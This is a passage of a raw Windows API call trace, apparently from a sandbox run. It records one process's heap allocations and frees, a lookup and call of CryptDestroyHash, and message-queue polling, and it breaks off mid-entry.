[0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0174.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0174.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd918 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0174.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0174.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0174.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0174.112] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0174.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0174.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0174.113] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0174.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0174.114] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0174.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0174.114] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4c0 [0174.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0174.115] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0174.115] CryptDestroyHash (hHash=0x90af58) returned 1 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0174.115] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.115] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0174.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0174.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0174.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0174.116] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0174.116] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0174.117] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0174.117] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0174.117] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0174.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0174.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0174.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0174.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0174.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0174.121] RtlAllocateHeap 